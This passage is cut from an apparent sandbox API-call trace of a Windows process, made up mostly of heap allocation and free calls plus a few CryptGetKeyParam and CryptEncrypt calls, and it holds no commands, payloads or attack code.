lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0115.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0115.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0115.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0115.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0115.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0115.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0115.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0115.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0115.141] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0115.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0115.142] CryptGetKeyParam (in: hKey=0x41ac440, dwParam=0x7, pbData=0x43e2770, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2770*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0115.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.143] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0115.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.144] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.144] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d05a8 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0115.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0115.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.146] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.146] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.146] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.146] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0115.147] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0115.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.147] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.147] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.147] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0115.148] CryptEncrypt (in: hKey=0x41ac440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0x6953, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0x6960) returned 1 [0115.148] CharLowerBuffW (in: lpsz="byte[26977]", cchLength=0xb | out: lpsz="byte[26977]") returned 0xb [0115.148] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.148] WideCharToMultiByte (in: CodePage=0x0, 